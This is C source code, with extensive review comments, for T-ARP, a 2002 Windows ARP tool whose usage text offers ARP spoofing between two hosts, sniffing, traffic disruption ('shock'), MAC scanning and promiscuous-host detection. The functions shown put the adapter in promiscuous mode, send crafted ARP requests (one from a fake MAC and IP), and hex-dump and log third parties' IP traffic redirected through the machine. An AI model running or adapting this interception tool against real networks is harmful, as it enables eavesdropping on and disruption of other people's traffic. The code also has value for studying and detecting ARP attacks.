五) T-ARP源代码
#include <packet32.h>
#include <ntddndis.h>
#include <conio.h>
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#pragma comment(lib,"ws2_32")
#pragma comment(lib,"packet")
#define ETH_IP 0x0800
#define ETH_ARP 0x0806
#define ARP_REQUEST 0x0001
#define ARP_REPLY 0x0002
#define ARP_HARDWARE 0x0001
#define max_num_adapter 10
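#pragma pack(push,1)
/* Ethernet II header, 14 bytes on the wire; eh_type is in network byte order. */
typedef struct ethdr
{
    unsigned char eh_dst[6];
    unsigned char eh_src[6];
    unsigned short eh_type;
}ETHDR,*PETHDR;
/*
 * ARP packet for Ethernet/IPv4, 28 bytes on the wire. arp_spa and arp_tpa
 * hold the sender/target IPv4 addresses in network byte order. They were
 * declared `unsigned long`, which is 4 bytes on Win32 but 8 on LP64 targets
 * (making the struct 36 bytes and every frame built from it malformed), so
 * they are `unsigned int` here, matching the IPv4 fields of iphdr below.
 */
typedef struct arphdr
{
    unsigned short arp_hdr;
    unsigned short arp_pro;
    unsigned char arp_hln;
    unsigned char arp_pln;
    unsigned short arp_opt;
    unsigned char arp_sha[6];
    unsigned int arp_spa;
    unsigned char arp_tha[6];
    unsigned int arp_tpa;
}ARPHDR,*PARPHDR;
/* IPv4 header without options, 20 bytes; multi-byte fields in network byte order. */
typedef struct iphdr
{
    unsigned char h_lenver;
    unsigned char tos;
    unsigned short total_len;
    unsigned short ident;
    unsigned short frag_and_flags;
    unsigned char ttl;
    unsigned char proto;
    unsigned short checksum;
    unsigned int sourceip;
    unsigned int destip;
}IPHDR,*PIPHDR;
/* Restore the packing in effect before the push above (the original pushed
 * a second time instead of popping, leaving byte packing on for the rest of
 * the translation unit). */
#pragma pack(pop)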
/* Process-wide state shared by the capture thread and the senders. */
LPADAPTER lpadapter = 0;   /* adapter handle passed to every Packet* call; opened elsewhere (not visible here) */
LPPACKET lppacketr = 0;    /* receive descriptor, allocated by sniff() */
LPPACKET lppackets = 0;    /* send descriptor used by getmine()/sendMASR(); allocated elsewhere */
ULONG myip = 0;            /* our IPv4 address, host byte order (htonl() is applied before wire comparisons) */
ULONG firstip = 0;         /* first target, host byte order */
ULONG secondip = 0;        /* second target, host byte order */
UCHAR mmac[6] = {0};       /* our MAC, copied from the ARP reply for myip by getdata() */
UCHAR fmac[6] = {0};       /* MAC of firstip, learned by getdata() */
UCHAR smac[6] = {0};       /* MAC of secondip, learned by getdata() */
BOOL mm = FALSE;           /* mmac is known */
BOOL fm = FALSE;           /* fmac is known */
BOOL sm = FALSE;           /* smac is known */
FILE *fp = 0;              /* log file written by getdata(); opened elsewhere (not visible here) */
char adapterlist[max_num_adapter][1024];   /* adapter names; not referenced in the code visible here */
char msg[50];              /* one "src ---> dst" log record built by getdata() */
int num = 0;               /* offset added to firstip by sendMASR(); advances by one per call */
/* Print the program banner (name, author, date, home page, contact). */
void start()
{
    static const char banner[] =
        "T-ARP --- ARP Tools, by TOo2y(ò1é?), 11-9-2002\n"
        "Homepage: www.safechina.net\n"
        "E-mail: [email protected]\n";
    fputs(banner, stdout);
}
/*
 * Print the command-line help: the four modes (-m mac list, -a antisniff,
 * -s spoof/sniff/shock, -r reset) and the two prerequisites (WinPcap 2.3 or
 * 3.0 alpha, and IPEnableRouter=1 so the host forwards the redirected traffic).
 */
void usage()
{
    static const char *const lines[] = {
        "\nUsage: T-ARP [-m|-a|-s|-r] firstip secondip \n\n",
        "Option:\n",
        " -m mac Get the mac address from firstip to secondip\n",
        " -a antisniff Get the sniffing host from firstip to secondip\n",
        " -s spoof 1> Spoof the host between firstip and secondip\n",
        " sniff 2> Sniff if firstip == secondip == your own ip\n",
        " shock 3> Shock if firstip == secondip != your own ip\n",
        " -r reset Reset the spoofed host work normally\n\n",
        "Attention:\n",
        " 1> You must have installed the winpcap_2.3 or winpcap_3.0_alpha\n",
        " 2> HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\IPEnableRouter==0x1\n\n",
    };
    size_t i;
    for (i = 0; i < sizeof lines / sizeof lines[0]; i++)
        fputs(lines[i], stdout);
}
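/*
 * Learn our own MAC address. Broadcasts an ARP request for myip whose sender
 * addresses are fake (MAC 82-82-82-82-82-82, IP 112.112.112.112). The reply
 * for myip is presumably addressed to that fake MAC; getdata(), which runs
 * with the adapter in promiscuous mode, copies the reply's source MAC into
 * mmac when it sees a reply whose sender IP is myip.
 *
 * Uses the globals myip, lpadapter and lppackets (lppackets must already be
 * allocated by the caller). Returns 0 once the frame is handed to the driver,
 * -1 if PacketSendPacket fails (the error code is printed).
 */
int getmine()
{
    char sendbuf[1024];
    ETHDR eth;
    ARPHDR arp;

    memset(eth.eh_dst, 0xff, sizeof(eth.eh_dst));    /* broadcast */
    memset(eth.eh_src, 0x82, sizeof(eth.eh_src));    /* fake sender hardware address */
    memset(arp.arp_sha, 0x82, sizeof(arp.arp_sha));
    memset(arp.arp_tha, 0x00, sizeof(arp.arp_tha));  /* unknown target hardware address */
    eth.eh_type = htons(ETH_ARP);
    arp.arp_hdr = htons(ARP_HARDWARE);
    arp.arp_pro = htons(ETH_IP);
    arp.arp_hln = 6;
    arp.arp_pln = 4;
    arp.arp_opt = htons(ARP_REQUEST);
    arp.arp_tpa = htonl(myip);                        /* "who has myip?" -- our own stack answers */
    arp.arp_spa = inet_addr("112.112.112.112");       /* fake sender protocol address */

    /* Frame = Ethernet header followed immediately by the ARP packet (both packed). */
    memset(sendbuf, 0, sizeof(sendbuf));
    memcpy(sendbuf, &eth, sizeof(eth));
    memcpy(sendbuf + sizeof(eth), &arp, sizeof(arp));
    PacketInitPacket(lppackets, sendbuf, sizeof(eth) + sizeof(arp));
    if (PacketSendPacket(lpadapter, lppackets, TRUE) == FALSE) {
        printf("PacketSendPacket in getmine Error: %lu\n", (unsigned long)GetLastError());
        return -1;
    }
    return 0;
}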
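/* Bytes shown per hex-dump row. */
#define DUMP_ROW 16
/* Layout of the log record built in msg: 15-char src, " --->   ", 15-char dst. */
#define MSG_DST_OFF 23
#define MSG_LEN 38

/* Print a 6-byte MAC as xx-xx-xx-xx-xx-xx, no trailing newline. */
static void print_mac(const unsigned char *mac)
{
    int k;
    for (k = 0; k < 5; k++)
        printf("%.2x-", mac[k]);
    printf("%.2x", mac[5]);
}

/*
 * Mode-3 filter for an IP frame. True for third-party traffic (neither end
 * is us) that arrived at our MAC and involves firstip or secondip -- i.e.
 * traffic redirected through us -- or, when both targets were given as our
 * own IP, for every IP frame.
 */
static int wanted_ip_frame(const ETHDR *eth, const IPHDR *ip)
{
    ULONG my = htonl(myip);
    ULONG a = htonl(firstip);
    ULONG b = htonl(secondip);
    /* memcmp, not strcmp: a MAC is 6 raw bytes, not a NUL-terminated string. */
    int third_party = ip->sourceip != my && ip->destip != my
                      && memcmp(eth->eh_dst, mmac, 6) == 0;
    int hits_target = ip->sourceip == a || ip->destip == a
                      || ip->sourceip == b || ip->destip == b;
    return (third_party && hits_target) || (firstip == myip && secondip == myip);
}

/*
 * Log one IP frame: "[IP:]src ---> [IP:]dst" on stdout and in fp, then a
 * hex/ASCII dump of the caplen captured bytes starting at frame (only the
 * ASCII column goes to fp). fp is assumed to be open -- it is opened
 * elsewhere, not in the code visible here.
 */
static void dump_ip_frame(const char *frame, ULONG caplen, const IPHDR *ip)
{
    struct sockaddr_in sin;
    const char *row;
    ULONG left, n, col;

    /* inet_ntoa() reuses one static buffer, so each result is consumed before
     * the next call. "%.15s" bounds the copy (a dotted quad is at most 15
     * chars) and the record is padded with spaces instead of the NUL bytes the
     * original wrote into the log. */
    memset(msg, 0, sizeof(msg));
    sin.sin_addr.s_addr = ip->sourceip;
    printf("[IP:]%16s ---> [IP:]", inet_ntoa(sin.sin_addr));
    sprintf(msg, "%-15.15s --->   ", inet_ntoa(sin.sin_addr));
    sin.sin_addr.s_addr = ip->destip;
    printf("%16s\n", inet_ntoa(sin.sin_addr));
    sprintf(msg + MSG_DST_OFF, "%-15.15s", inet_ntoa(sin.sin_addr));

    /* Step back over the previous record's trailing CRLF, then separate records. */
    fseek(fp, -2, SEEK_CUR);
    fwrite("\r\n\r\n\r\n", 6, 1, fp);
    fwrite(msg, MSG_LEN, 1, fp);
    fwrite("\r\n", 2, 1, fp);

    for (row = frame, left = caplen; left > 0; row += n, left -= n) {
        n = left > DUMP_ROW ? DUMP_ROW : left;
        printf("%08lx : ", (unsigned long)(row - frame));
        for (col = 0; col < n; col++)
            printf("%02x ", (unsigned char)row[col]);
        if (n < DUMP_ROW)   /* pad the short last row so the ASCII column lines up */
            printf("%*s", (int)((DUMP_ROW - n) * 3), " ");
        for (col = 0; col < n; col++) {
            /* isprint() takes unsigned char values; plain char may be negative. */
            int c = (unsigned char)row[col];
            int shown = isprint(c) ? c : '.';
            printf("%c", shown);
            fputc(shown, fp);
        }
        printf("\n");
    }
    printf("\n");
    fwrite("\r\n", 2, 1, fp);
}

/*
 * Record an ARP reply. A reply whose sender IP is myip yields our own MAC
 * (mmac; see getmine()). In modes 1 and 2 every reply is listed; in modes
 * 3 and 4 the replies from firstip/secondip fill fmac/smac.
 *
 * NOTE(review): ARP is unauthenticated -- any host on the segment can forge
 * a reply for myip, firstip or secondip and steer mmac/fmac/smac.
 */
static void note_arp_reply(const ETHDR *eth, const ARPHDR *arp, int op)
{
    struct sockaddr_in sin;
    sin.sin_addr.s_addr = arp->arp_spa;

    if (arp->arp_spa == htonl(myip)) {
        memcpy(mmac, eth->eh_src, 6);
        if (!mm) {
            printf("\t");
            print_mac(eth->eh_src);
            printf("\n");
            if (op == 1)
                printf("\n[MAC LIST:]");
            else if (op == 2)
                printf("\n[Sniffing Host:]");
        }
        mm = TRUE;
    }
    if (op == 1 || op == 2) {
        printf("\n[IP:] %.16s [MAC:] ", inet_ntoa(sin.sin_addr));
        print_mac(eth->eh_src);
    } else if ((op == 3 || op == 4) && (!fm || !sm)) {
        if (arp->arp_spa == htonl(firstip)) {
            memcpy(fmac, eth->eh_src, 6);
            fm = TRUE;
        }
        if (arp->arp_spa == htonl(secondip)) {
            memcpy(smac, eth->eh_src, 6);
            sm = TRUE;
        }
    }
}

/*
 * Walk one PacketReceivePacket() buffer: a sequence of bpf_hdr records, each
 * followed by its captured frame and padded to Packet_WORDALIGN. IP frames
 * are dumped in mode 3 once both target MACs are known (fm && sm); ARP
 * replies update mmac/fmac/smac. Returns as soon as a key is pressed.
 *
 * lp - filled receive descriptor (lp->Buffer, lp->ulBytesReceived)
 * op - tool mode, apparently 1 = mac list, 2 = antisniff, 3 = spoof/sniff/
 *      shock, 4 = reset (from the labels printed and the usage() text)
 *
 * Every length here comes from the driver/network and is checked before it
 * is used as an offset; a record that does not fit in the buffer, or a frame
 * too short for the header we are about to read, is not parsed. The original
 * also left the dump length (tlen) uninitialized; it is now the capture length.
 */
void getdata(LPPACKET lp,int op)
{
    char *buf = (char *)lp->Buffer;
    ULONG total = lp->ulBytesReceived;
    ULONG off = 0;
    ULONG caplen;
    struct bpf_hdr *hdr;
    char *frame;
    ETHDR *eth;

    while (off < total) {
        if (kbhit())
            return;
        if (total - off < sizeof(struct bpf_hdr))
            return;                                   /* truncated record header */
        hdr = (struct bpf_hdr *)(buf + off);
        if (hdr->bh_hdrlen > total - off)
            return;
        caplen = hdr->bh_caplen;
        if (caplen > total - off - hdr->bh_hdrlen)
            return;                                   /* captured data would overrun the buffer */
        frame = buf + off + hdr->bh_hdrlen;
        off = Packet_WORDALIGN(off + hdr->bh_hdrlen + caplen);

        if (caplen < sizeof(ETHDR))
            continue;
        eth = (ETHDR *)frame;
        if (eth->eh_type == htons(ETH_IP)) {
            const IPHDR *ip = (const IPHDR *)(frame + sizeof(ETHDR));
            if (caplen < sizeof(ETHDR) + sizeof(IPHDR))
                continue;
            if (fm && sm && op == 3 && wanted_ip_frame(eth, ip))
                dump_ip_frame(frame, caplen, ip);
        } else if (eth->eh_type == htons(ETH_ARP)) {
            const ARPHDR *arp = (const ARPHDR *)(frame + sizeof(ETHDR));
            if (caplen < sizeof(ETHDR) + sizeof(ARPHDR))
                continue;
            if (arp->arp_opt == htons(ARP_REPLY))
                note_arp_reply(eth, arp, op);
        }
    }
}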
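/*
 * Capture thread body (CreateThread entry). Puts the adapter in promiscuous
 * mode, sizes the kernel buffer, then hands every PacketReceivePacket()
 * buffer to getdata() until a key is pressed.
 *
 * no - pointer to the int mode forwarded to getdata() (1..4; see usage())
 *
 * Returns 0 on a normal stop, (DWORD)-1 on a setup or receive failure.
 * Promiscuous mode is not optional in practice: getmine() sends its probe
 * from a fake MAC, so the reply that reveals our own MAC is presumably only
 * visible promiscuously. lppacketr is not freed here; whoever closes
 * lpadapter (not visible in this listing) is assumed to PacketFreePacket()
 * it -- TODO confirm.
 */
DWORD WINAPI sniff(LPVOID no)
{
    /* GetLastError() value seen when the adapter handle is closed under the
     * receive call (ERROR_INVALID_HANDLE); treated as a clean stop, as the
     * original did with the bare value 6. */
    const DWORD err_invalid_handle = 6;
    int option = *(int *)no;
    char recvbuf[1024 * 250];      /* 250 KiB user-side buffer on this thread's stack */

    if (PacketSetHwFilter(lpadapter, NDIS_PACKET_TYPE_PROMISCUOUS) == FALSE)
        printf("Warning: Unable to set the adapter to promiscuous mode\n");
    if (PacketSetBuff(lpadapter, 500 * 1024) == FALSE) {
        printf("PacketSetBuff Error: %lu\n", (unsigned long)GetLastError());
        return (DWORD)-1;
    }
    if (PacketSetReadTimeout(lpadapter, 1) == FALSE)
        printf("Warning: Unable to set the timeout\n");
    /* PacketAllocatePacket returns a pointer; compare with NULL, not FALSE. */
    if ((lppacketr = PacketAllocatePacket()) == NULL) {
        printf("PacketAllocatePacket receive Error: %lu\n", (unsigned long)GetLastError());
        return (DWORD)-1;
    }
    PacketInitPacket(lppacketr, recvbuf, sizeof(recvbuf));

    while (!kbhit()) {
        if (PacketReceivePacket(lpadapter, lppacketr, TRUE) == FALSE) {
            DWORD err = GetLastError();
            if (err == err_invalid_handle)
                return 0;
            printf("PacketReceivePacket Error: %lu\n", (unsigned long)err);
            return (DWORD)-1;
        }
        getdata(lppacketr, option);
    }
    return 0;
}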
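/*
 * Send the ARP request(s) for one tool mode (thread entry; also usable as a
 * plain call). Every request is broadcast and names myip/mmac as the sender.
 *
 * no - pointer to the int mode: 1 and 2 probe firstip+num, and num advances
 *      by one per call so repeated calls sweep a range; 3 and 4 probe firstip
 *      and then secondip.
 *
 * Mode 2 sends to ff-ff-ff-ff-ff-fe instead of the broadcast address. The
 * idea (inferred; this is the "antisniff" option of usage()) is that a NIC
 * in normal mode drops such a frame while a host in promiscuous mode still
 * answers, which getdata() then lists as a sniffing host.
 *
 * Returns 0 on success, (DWORD)-1 for a mode outside 1..4 or a send failure
 * (the error code is printed). Uses the globals mmac, myip, firstip,
 * secondip, num, lpadapter and lppackets.
 */
DWORD WINAPI sendMASR(LPVOID no)
{
    int fun = *(int *)no;
    char sendbuf[1024];
    ETHDR eth;
    ARPHDR arp;
    ULONG target[2];
    int ntargets, k;

    if (fun < 1 || fun > 4)
        return (DWORD)-1;

    memset(eth.eh_dst, 0xff, sizeof(eth.eh_dst));
    memset(arp.arp_tha, 0x00, sizeof(arp.arp_tha));
    if (fun == 2)
        eth.eh_dst[5] = 0xfe;          /* "almost broadcast": only promiscuous hosts should see it */
    memcpy(eth.eh_src, mmac, 6);
    eth.eh_type = htons(ETH_ARP);
    arp.arp_hdr = htons(ARP_HARDWARE);
    arp.arp_pro = htons(ETH_IP);
    arp.arp_hln = 6;
    arp.arp_pln = 4;
    arp.arp_opt = htons(ARP_REQUEST);
    arp.arp_spa = htonl(myip);
    memcpy(arp.arp_sha, mmac, 6);

    if (fun == 1 || fun == 2) {
        target[0] = firstip + (ULONG)(num++);
        ntargets = 1;
    } else {
        target[0] = firstip;
        target[1] = secondip;
        ntargets = 2;
    }

    for (k = 0; k < ntargets; k++) {
        arp.arp_tpa = htonl(target[k]);
        /* Frame = Ethernet header followed immediately by the ARP packet (both packed). */
        memset(sendbuf, 0, sizeof(sendbuf));
        memcpy(sendbuf, &eth, sizeof(eth));
        memcpy(sendbuf + sizeof(eth), &arp, sizeof(arp));
        PacketInitPacket(lppackets, sendbuf, sizeof(eth) + sizeof(arp));
        if (PacketSendPacket(lpadapter, lppackets, TRUE) == FALSE) {
            printf("PacketSendPacket in sendMASR Error: %lu\n", (unsigned long)GetLastError());
            return (DWORD)-1;
        }
    }
    return 0;
}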